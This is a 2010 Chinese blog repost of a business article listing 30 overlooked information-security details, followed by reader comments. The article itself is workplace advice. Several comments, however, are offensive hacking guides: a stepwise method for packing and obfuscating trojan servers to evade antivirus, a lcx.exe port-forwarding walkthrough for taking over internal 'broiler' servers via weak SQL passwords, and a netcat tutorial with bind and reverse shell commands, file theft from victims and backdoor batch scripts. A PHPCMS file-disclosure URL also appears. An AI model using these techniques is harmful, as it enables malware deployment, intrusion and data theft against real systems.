安全基础信息安全不可低估的30个细节[ZZ]

Posted on | 八月 2, 2010 | 10 Comments

信息安全?“不就是安装杀毒软件，在电脑上设设密码吗”?当你这样想，你就和全世界95%的人一样，都错估、低估了信息对公司的致命影响;好在全世界就是有5%的人，和《中国财富》一样，恐惧、震慑、急着应变于信息对商业世界爆炸性的影响力。

　　小心30个细节，一分钟毁灭你的公司，这是一个以1%、2%决胜负的商业时代，一个信息就可以左右企业的成败。这个信息在自己手里是王牌，在对手手里是炸弹。

　　如此重要的信息，可能在老板的大脑里、公司电脑里、一个打印稿的背面，甚至在一个垃圾筐里。随时都有泄漏的可能，泄漏的结果轻则使公司蒙受损失，重则毁灭公司。

　　当你读这篇文章的时候，全世界又有2个企业因为信息安全问题倒闭，有11个企业因为信息安全问题造成大概800多万的直接经济损失。中国财富通过对100个经理人的调查总结30个致命细节，让您5分钟快速成为信息安全专家。

　　1、打印机——10秒延迟带来信息漏洞即使是激光打印机，也有10秒以上的延迟，如果你不在第9秒守在打印机的旁边，第一个看到文件的人可能就不是你了。大部分的现代化公司都使用公用的打印机，并且将打印机、复印机等器材放在一个相对独立的空间里。于是，部门之间的机密文件就可以从设备室开始，在其它部门传播，当部门之间没有秘密，公司也就没有秘密了。

　　2、打印纸背面——好习惯换取的大损失节约用纸是很多公司的好习惯，员工往往会以使用背面打印纸为荣。其实，将拥有这种习惯公司的“废纸”收集在一起，你会发现打印、复印造成的废纸所包含公司机密竟然如此全面，连执行副总都会觉得汗颜，因为废纸记载了公司里比他的工作日记都全面的内容。

　　3、电脑易手——新员工真正的入职导师我们相信，所有的职业经理人都有过这样的经历:如果自己新到一家公司工作，在自己前任的电脑里漫游是了解新公司最好的渠道。在一种近似“窥探”的状态下，公司里曾经发生过的事情“尽收眼底”，从公司以往的客户记录、奖惩制度、甚至你还有幸阅读前任的辞呈。如果是其它部门的电脑，自然也是另有一番乐趣。

　　4、共享——做好文件再通知窃取者局域网中的共享是获得公司内部机密最后的通道。有的公司为了杜绝内部网络□□□□，规定所有人在共享以后一定要马上取消。实际上越是这样，企业通过共享泄露机密的风险越大。因为当人们这样做的时候，会无所顾及地利用共享方式传播信息，人们习惯的方式是在开放式办公间的这边对着另一边的同事喊:“我放在共享里了，你来拿吧——”，没错，会有人去拿的，却往往不只是你期望的人。
5、指数对比——聪明反被聪明误在传统的生产型企业之间，经常要推测竞争对手的销售数量、生产数量。于是，人们为了隐藏自己的实际数量，而引入了统计学里的指数，通过对实际数量的加权，保护自己的机密信息。唯一让人遗憾的是，通常采取的简单基期加权，如果被对方了解到几年内任何一个月的真实数量，所有的真实数量就一览无余地出现在竞争对手的办公桌上了。

　　6、培训——信息保卫战从此被动新员工进入公司，大部分的企业会对新员工坦诚相见。从培训的第一天开始，新员工以“更快融入团队”的名义，接触公司除财务以外所有的作业部门，从公司战略到正在采取的战术方法，从公司的核心客户到关键技术。但事实上，总有超过五分之一的员工会在入职三个月以后离开公司。同时，他们中的大部份没有离开现在从事的行业，或许正在向你的竞争对手眉飞色舞地描述你公司的一草一木。

　　7、传真机——你总是在半小时后才拿到发给你的传真总有传真是“没有人领取”的，每周一定有人收不到重要的传真;人们总是“惊奇地”发现，自己传真纸的最后一页是别人的开头，而你的开头却怎么也找不到了。

　　8、公用设备——不等于公用信息在小型公司或者一个独立的部门里，人们经常公用U盘、软盘或手提电脑。如果有机会把U盘借给公司的新会计用，也就有可能在对方归还的时候轻易获得本月的公司损益表。

　　9、摄像头——挥手之间断送的竞标机会总部在上海的一家国内大型广告公司，在2004年3月出现的那一次信息泄露，导致竞标前一天，广告创意被竞争对手窃取，原因竟然是主创人员的OICQ上安装了视频，挥手之间，断送的或许并不仅仅是一次合作的机会。

　　10、产品痕迹——靠“痕迹”了解你的未来在市场调查领域，分析产品痕迹来推断竞争对手行销效果和行销策略是通用的方法。产品的运输、仓储、废弃的包装，都可以在竞争对手购买的调研报告中出现，因为“痕迹分析”已经是商业情报收集的常规手段。

　　11、压缩软件——对信息安全威胁最大的软件 ZIP、RAR是威胁企业信息安全最大的软件。3寸软盘的存储空间是1.4M，压缩软件可以让大型的WORD文件轻松存入一张软盘，把各种资料轻松带出公司。
12、光盘刻录——资料在备份过程中流失如果想要拿走公司的资料，最好的办法是申请光盘备份，把文件做成特定的格式，交给网络管理员备份，然后声称不能正常打开，要求重新备份，大多情况下，留在光驱里的“废盘”就可以在下班后大大方方带出公司。

　　13、邮箱——信息窃取的中转站利用电子邮件转移窃取的公司资料占所有信息窃取的八成以上。很多企业不装软驱、光驱、USB接口，却没有办法避免员工通过电子邮件的窃取信息，相比之下，以上方法显得有些幼稚、可笑。

　　14、隐藏分区——长期窃取公司资料必备手法长期在公司内搜集资料，用来出售或保留，总是件危险的事情。自己的电脑总是不免被别人使用，发现电脑里有不该有的东西怎么行。于是隐藏在硬盘分区就成了最佳选择，本来有C、D、E三个虚拟分区，可以把E隐藏起来，只有自己可以访问。当然，如果遇到行家，合计一下所有磁盘的总空间，可就一定露馅了。

　　15、私人电脑——大量窃取资料常用手段压缩软件的作用毕竟是有限的，如果把自己的笔记本电脑拿到单位来，连上局域网，只要半小时，就是有1个G的文件也可以轻松带走。

　　16、会议记录——被忽视的公司机密秘书往往把会议记录看得很平常，他们不知道一次高层的会议记录对于竞争对手意味着什么，公司里经常可以看见有人把会议记录当成废纸丢来丢去，任由公司最新的战略信息在企业的任何角落出现。

　　17、未被采纳的策划案——放弃也是一种选择策划人员知道被采纳的策划是公司机密，去往往不知道被放弃的策划也是公司机密。有时还会对客户或媒体谈起，而竞争对手可以轻松判断:你没有做这些，就一定选择做了那些!

　　18、客户——你的机密只是盟友的谈资经常可以在网络上看到著名咨询公司的客户提案，这些精心制作的PPT，凝聚了咨询公司团队的汗水和无数个不眠之夜，在一些信用较差的客户手里可能只是一些随意传播的谈资。

　　19、招聘活动——你的公司竟然在招聘总监? 在招聘过程中，成熟的企业不会把用人的单位登在一张广告里，因为那无异于告诉你的竞争对手:刚刚发生过人力震荡，人力匮乏。

　　20、招标前两分钟——最后的底价总是在最后“出炉” 如果投标的底价内部公开越早，出现泄露的风险越大，在招标开始前两分钟，面对关掉手机的参会者，可以公布底价了!
21、解聘后半小时——不要给他最后的机会如果被解雇的员工是今天才得到这个消息，那么，不要让他再回到他的电脑旁。半个小时的时间，刚好可以让他收拾自己的用品，和老同事做简短的告别，天下没有不散的筵席，半小时足够了，为了离职员工的清白，更为了信息安全。

　　22、入职后一星期——新人在第一个星期里收集的资料是平时的5倍只有在这一个星期里，他是随时准备离开的，他时刻处在疯狂的拷贝和传送状态，提防你的新员工，无论你多么欣赏他。

　　23、合作后半个月——竞争对手窃取情报的惯用手法是:假冒客户在初次合作的半个月里，你对信息安全的谨慎只能表明企业做事的严谨，可以赢得大部分客户的谅解和尊敬。除非，他是你的竞争对手。

　　24、离职后30天——危险来自公司以外一般情况下，一个为企业服务半年以上的员工，离职后30日之内会和公司现有员工保持频繁的联系，并且对公司的资料和状况表现出极度的热情。如果是被限时离开，那么，在离职30天内通过老同事窃取公司信息的可能性就更大。

　　25、明确对外提案原则——能不留东西的就不给打印稿，能不给电子档的就尽量给打印稿，能用电子书就不用通用格式。

　　26、保密协议——无论作用大小，和员工签定清晰的保密协议还是必要的无规矩不成方圆，明确什么是对的，人们才可以杜绝错的。保密协议的内容越详细越好，如果对方心胸坦白，自然会欣然同意。

　　27、责任分解——明确每个人对相关信息的安全责任所有的机密文件如果出现泄露，可以根据规定找到责任人，追究是次要的，相互监督和防范才是责任分解的最终目的。

　　28、设立信息级别——对公司的机密文件进行级别划分比如合同、客户交往、股东情况列为一级，确定机密传播的范围，让所有人了解信息的传播界限，避免因为对信息的不了解而导致的信息安全事故。

　　29、异地保存——别把鸡蛋放在同一个篮子里所有备份资料尽量做到异地保存，避免因为重大事故(如：火灾、地震、战争等)对企业信息带来致命的打击。

　　30、认为自己的企业在信息安全上无懈可击。

Category: IT, sec
Tags: 安全

评论|Comments

10 Responses to “安全基础信息安全不可低估的30个细节[ZZ]”

cq
八月 2nd, 2010 @ 19:28

1:生成无壳木马服务端(地球人都知道)
2:去头加花,要求,新建区段,把原入口写入新区段,然后再建区段,再建新头,跳回新区段的老入口,就是头前头,然后老入口不要直接回执行,再跳入空白处再加花指令,然后再回去原执行处,这样就完成了去头加花头前头,头后头,头前头和原头都是新区段,而且不是同区段.
3:再次用软件加密加花,可以多次加,只要程序可以正常运行就行.到这里基本已经过了主流全部国内杀软了,包括瑞内.
4:加壳,不需要加乱七八糟的壳,随便主流压缩壳就行,但是要重复加壳.加完后再把加过壳的程序去头加花头前头,头后头,这样就壳变型了.要注意的是程序可正常执行就可以了.
5:资源重建
6:再次加壳,一般主流压缩壳就行,双壳,注意不要用前面加过的壳就行,乱七八糟的壳别用,用了反而会被杀软杀,不是杀你程序,而是杀壳,不信你试试!
7:再次带壳去头加区段加花,头前头,头后头.
8:资源重建
9:加个普通压缩壳,双壳单壳随便!
10:丢世界反毒网上试试,注意把锁关上,distribute也关上,如果不关等于上报! [s:2] [s:2]
11:等待测试结果出来,你会惊奇的发现………………………

补充,生成服务端的时候尽量别写入windows和system32文件夹,否则行为查杀的软件必杀!

OMG.疯了
pc8
八月 3rd, 2010 @ 13:53

Is very good, to the top
phpcms
八月 3rd, 2010 @ 15:03

PHPCMS
/new/admin.php?mod=phpcms&file=safe&action=see_code&files=demo.php
cq
八月 5th, 2010 @ 14:48

啊。溢出成功，串截断符00，多覆盖几个区。
电影
八月 6th, 2010 @ 07:49

俺只是个爱看电影电视剧的人，对博客说实话不大热爱，但来了，就踩踩
cq
八月 6th, 2010 @ 23:10

ann1109@vip.qq.com
coo
八月 8th, 2010 @ 21:22

空虚的
love
八月 11th, 2010 @ 20:49

http://news.cnblogs.com/n/70537/
怎么样
八月 14th, 2010 @ 10:28

老七还是很牛的啊，我们这些新手菜鸟，还请老七同学多来照顾下，哈哈。。不过真是很希望你能在许愿树留下你的快乐，希望你能喜欢那里
cq
八月 18th, 2010 @ 22:14

　lcx.exe的使用方法

　　以前抓肉鸡都是通过1433弱口令,然后..

　　但是发现很多服务器开了1433,3389,但是终端是连不上的,因为服务器本身是在内网,只对外开放了1433端口,幸好有lcx.exe这个东西,用sqltools.exe传倒服务器上…

　　lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389.

　　用法:如在本机B上监听 -listen 51 3389，在肉鸡A上运行-slave 本机ip 51 肉鸡ip 3389 那么在本地连127.0.0.1就可以连肉鸡的3389.第二条是本机转向。

　　例:现在有一个ip为 201.1.1.1的1433弱.用端口扫描只发现开放了1433端口.用sqltools链接,dir 看一下 C:>DIR C:

　　2004/09/17 10:32

autoAK

　　2005/02/21 17:08 12,541 avgun.log。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

　　日语,显示不正常.呵呵.

　　netstat -an 查看开放端口 TCP 0.0.0.0:3376 0.0.0.0:0 LISTENING

　　TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING

　　TCP 0.0.0.0:3791 0.0.0.0:0 LISTENING

　　TCP 0.0.0.0:3877 0.0.0.0:0 LISTENING

　　终端已开.看下IP

　　ipconfig

　　C:>ipconfig

　　Windows 2000 IP Configuration Ethernet adapter

　　Connection-specific DNS Suffix . :

　　IP Address. . . . . . . . . . . . : 192.168.1.24

　　Subnet Mask . . . . . . . . . . . : 255.255.255.0

　　Default Gateway . . . . . . . . . : 192.168.1.1192这样的是内网了…

　　现在可以用lcx.exe搞定了…

　　上传lcx.exe到肉鸡…C:>dir lcx.exeC:WINNTsystem32

　　2006/04/02 13:40 32,768 lcx.exe首先在自己机子的cmd下运行

　　lcx.exe -listen 51 3389

　　意思是监听51端口并转发到3389端口

　　显示如下[+] Listening port 51 ……

　　[+] Listen OK!

　　[+] Listening port 3389 ……

　　[+] Listen OK!

　　[+] Waiting for Client on port:51 ……然后在肉鸡上运行 lcx.exe -slave 你的IP 51 201.1.1.1 3389

　　201.1.1.1是我举例用的肉鸡IP.换成你的..运行以后本机监听端口就会收到信息.[+] Listening port 51 ……

　　[+] Listen OK!

　　[+] Listening port 3389 ……

　　[+] Listen OK!

　　[+] Waiting for Client on port:51 ……

　　[+] Accept a Client on port 55 from 201.1.1.1 ……

　　[+] Waiting another Client on port:3389….好了.现在在自己机子上链接 127.0.0.1 或者输你自己IP.

　　发现进去的不是自己机子,(或者自己机子根本连不上),而是肉鸡A了!优点,搞定内网肉鸡.

　　缺点,有点麻烦,而且每次都要通过sqltools先进行端口转发.当然也可以用反弹木马控制肉鸡了…

　　+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

　　nc.exe的使用方法

　　1. Netcat 1.10 for NT – nc11nt.zip,原始英文信息

　　2. Netcat 1.10 for NT 帮助信息

　　3. Netcat 1.10 常用的命令格式

　　4. 管理肉鸡,更改肉鸡设置

　　5. 下载连接

　　######################################################################

　　1. Netcat 1.10 for NT – nc11nt.zip

　　######################################################################

　　Basic Features

　　* Outbound or inbound connections, TCP or UDP, to or from any ports

　　* Full DNS forward/reverse checking, with appropriate warnings

　　* Ability to use any local source port

　　* Ability to use any locally-configured network source address

　　* Built-in port-scanning capabilities, with randomizer

　　* Can read command line arguments from standard inputb

　　* Slow-send mode, one line every N seconds

　　* Hex dump of transmitted and received data

　　* Ability to let another program service established

　　connections

　　* Telnet-options responder

　　New for NT

　　* Ability to run in the background without a console window

　　* Ability to restart as a single-threaded server to handle a new

　　connection

　　________________________________________________________________________

　　Some of the features of netcat are:

　　Outbound or inbound connections, TCP or UDP, to or from any ports

　　Full DNS forward/reverse checking, with appropriate warnings

　　Ability to use any local source port

　　Ability to use any locally-configured network source address

　　Built-in port-scanning capabilities, with randomizer

　　Built-in loose source-routing capability

　　Can read command line arguments from standard input

　　Slow-send mode, one line every N seconds

　　Optional ability to let another program service inbound connections

　　Some of the potential uses of netcat:

　　Script backends

　　Scanning ports and inventorying services

　　Backup handlers

　　File transfers

　　Server testing and simulation

　　Firewall testing

　　Proxy gatewaying

　　Network performance testing

　　Address spoofing tests

　　Protecting X servers

　　1001 other uses you`ll likely come up with

　　Netcat + Encryption = Cryptcat

　　对比win2000微软的telnet.exe和微软的tlntsvr.exe服务,连接的时候就可以看出来了.

　　1.1 NC.EXE是一个非标准的telnet客户端程序,

　　1.2 还有一个putty.exe客户端程序,提供四种连接模式

　　-raw -telnet -rlogin -ssh.

　　######################################################################

　　2. Netcat 1.10 for NT 帮助信息

　　######################################################################

　　C:WINDOWSDesktop>nc -h

　　[v1.10 NT]

　　connect to somewhere: nc [-options] hostname port[s] [ports] …

　　listen for inbound: nc -l -p port [options] [hostname] [port]

　　options:

　　-d detach from console, background mode (后台模式)

　　-e prog inbound program to exec [dangerous!!]

　　-g gateway source-routing hop point[s], up to 8

　　-G num source-routing pointer: 4, 8, 12, …

　　-h this cruft (本帮助信息)

　　-i secs delay interval for lines sent, ports scanned (延迟时间)

　　-l listen mode, for inbound connects (监听模式,等待连接)

　　-L listen harder, re-listen on socket close (连接关闭后,仍然继续监听)

　　-n numeric-only IP addresses, no DNS (ip数字模式,非dns解析)

　　-o file hex dump of traffic (十六进制模式输出文件,三段)

　　-p port local port number (本地端口)

　　-r randomize local and remote ports (随机本地远程端口)

　　-s addr local source address (本地源地址)

　　-t answer TELNET negotiation

　　-u UDP mode

　　-v verbose [use twice to be more verbose] (-vv 更多信息)

　　-w secs timeout for connects and final net reads

　　-z zero-I/O mode [used for scanning] (扫描模式,-vv)

　　port numbers can be individual or ranges: m-n [inclusive]

　　######################################################################

　　3. Netcat 1.10 常用的命令格式

　　######################################################################

　　下面引用《沉睡不醒 10月15日凌晨》的文章的部分。

　　3.1.端口的刺探：

　　nc -vv ip port

　　RIVER [192.168.0.198] 19190 (?) open //显示是否开放open

　　3.2.扫描器

　　nc -vv -w 5 ip port-port port

　　nc -vv -z ip port-port port

　　这样扫描会留下大量的痕迹，系统管理员会额外小心

　　3.3. 后门

　　victim machine: //受害者的机器

　　nc -l -p port -e cmd.exe //win2000

　　nc -l -p port -e /bin/sh //unix,linux

　　attacker machine: //攻击者的机器.

　　nc ip -p port //连接victim_IP,然后得到一个shell。

　　3.4.反向连接

　　attacker machine: //一般是sql2.exe,远程溢出,webdavx3.exe攻击.

　　//或者wollf的反向连接.

　　nc -vv -l -p port

　　victim machine:

　　nc -e cmd.exe attacker ip -p port

　　nc -e /bin/sh attacker ip -p port

　　或者：

　　attacker machine:

　　nc -vv -l -p port1 /*用于输入*/

　　nc -vv -l -p prot2 /*用于显示*/

　　victim machine:

　　nc attacker_ip port1 | cmd.exe | nc attacker_ip port2

　　nc attacker_ip port1 | /bin/sh | nc attacker_ip port2

　　139要加参数-s(nc.exe -L -p 139 -d -e cmd.exe -s 对方机器IP)

　　这样就可以保证nc.exe优先于NETBIOS。

　　3.5.传送文件：

　　3.5.1 attacker machine < -- victim machine //从肉鸡拖密码文件回来.

　　nc -d -l -p port pathfile.txt /*victim machine*/ 需要Ctrl+C退出

　　//肉鸡需要gui界面的cmd.exe里面执行(终端登陆,不如安装FTP方便).否则没有办法输入

　　Crl+C.

　　3.5.2 attacker machine --> victim machine //上传命令文件到肉鸡

　　nc -vv -l -p port > pathfile.txt　　　　　 /*victim machine*/ 需要Ctrl+C退

　　出

　　nc -d victim_ip port < pathfiledest 　 /*attacker machine*/ 可以shell执行

　　//这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆.

　　结论: 可以传输ascii,bin文件.可以传输程序文件.

　　问题:连接某个ip后,传送完成后,需要发送Ctrl+C退出nc.exe .

　　或者只有再次连接使用pskill.exe 杀掉进程.但是是否释放传输文件打开的句柄了?

　　3.6 端口数据抓包.

　　nc -vv -w 2 -o test.txt http://www.xfocus.net 80 21-15

　　< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax erro

　　r

　　< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" un

　　r

　　< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized...

　　< 00000084 83 00 00 01 8f # .....

　　3.7 telnet,自动批处理。 ★★★★★我要重点推荐的东西就是这个.

　　nc victim_ip port < pathfile.cmd 　 /*victim machine*/ 显示执行过程.

　　nc -vv victim_ip port < pathfile.cmd 　 /*victim machine*/ 显示执行过程.

　　nc -d victim_ip port a.cmd

　　@echo s >>a.cmd

　　@echo cd /d %%windir%%system32 >>a.cmd

　　@net stop “sksockserver” >>a.cmd

　　@snake.exe -config port 11111 >>a.cmd

　　@net start “sksockserver” >>a.cmd

　　@exit >>a.cmd

　　:auto

　　@for /f “eol=; tokens=1,2″ %%i in (%1) do @(nc.exe -vv -w 3 %%i 1234 >80.txt

　　goto start

　　把防火墙关掉以后运行这个批处理，会监听到许多探测U漏洞的信息，大多

　　是三条一组–妮姆达病毒扫描你的。这样就会得到肉鸡的.虽然质量不高.

　　但是也是一种便宜的办法.

　　肉鸡特征：

　　1。unicode漏洞

　　2。guest密码为空，administrators组用户

　　3。其他漏洞

　　自己慢慢的爽去吧。不过，再次强调一句，不建议而且是不能破坏国内主机，上去以后

　　将tftp.exe改名。然后用pskill干掉mmc.exe进程，之后是杀毒。做好后门以后，将gue

　　st帐号停用，以对付傻瓜扫描器

　　######################################################################

　　5. 下载连接

　　######################################################################

　　5.1 http://www.atstake.com/research/tools/network_utilities/

　　Tool: Netcat 1.10 for Unix

　　Version: 03.20.96

　　Platforms: *nix

　　Tool: Netcat 1.1 for Win 95/98/NT/2000

　　Version: 02.08.98

　　Platforms: Runs on Win 95/98/NT/2000

　　5.2 http://www.xfocus.net/download.php?id=320

　　名称： cryptcat_nt.zip 更新时间： 2002-04-05

　　类别：网络工具平台： Win9x/NT/2000 大小： 115.8K 提交： maxilaw

　　简介：加密传输的nc。

　　5.3 http://content.443.ch/pub/security/blackhat/Networking/nc/国外的网站

　　10.03.02 15:48 1305 cryptcat.txt

　　10.03.02 15:48 245760 cryptcat_linux2.tar

　　10.03.02 15:48 118533 cryptcat_nt.zip

　　++++++++++++++++++++++++++++++++++++++++++++

　　sc.exe的使用方法

　　Microsoft Windows [版本 5.2.3790]

　　(C) 版权所有 1985-2003 Microsoft Corp.

　　c:>sc

　　描述:

　　SC 是用于与服务控制管理器通信的命令行程序。

　　用法:

　　sc [command] [service name] …

　　选项的格式为 “ServerName”

　　可以键入 “sc [command]“以获得命令的进一步帮助

　　命令:

　　query———–查询服务的状态，

　　或枚举服务类型的状态。

　　queryex———查询服务的扩展状态，

　　或枚举服务类型的状态。

　　start———–启动服务。

　　pause———–发送 PAUSE 控制请求到服务。

　　interrogate—–发送 INTERROGATE 控制请求到服务。

　　continue——–发送 CONTINUE 控制请求到服务。

　　stop————发送 STOP 请求到服务。

　　config———-(永久地)更改服务的配置。

　　description—–更改服务的描述。

　　failure———更改服务失败时所进行的操作。

　　qc————–查询服务的配置信息。

　　qdescription—-查询服务的描述。

　　qfailure——–查询失败服务所进行的操作。

　　delete———-(从注册表)删除服务。

　　create———-创建服务(将其添加到注册表)。

　　control———发送控制到服务。

　　sdshow———-显示服务的安全描述符。

　　sdset———–设置服务的安全描述符。

　　GetDisplayName–获取服务的 DisplayName。

　　GetKeyName——获取服务的 ServiceKeyName。

　　EnumDepend——枚举服务的依存关系。

　　下列命令不查询服务名称:

　　sc

　　boot————(ok | bad) 表明是否将上一次启动保存为

　　最后所知的好的启动配置

　　Lock————锁定服务数据库

　　QueryLock——-查询 SCManager 数据库的 LockStatus

　　示例:

　　sc start MyService

　　您想查阅 QUERY 和 QUERYEX 命令的帮助吗? [ y | n ]:

　　这是自带的帮助

　　如果要删除一个已经存在的服务就是

　　sc delete servername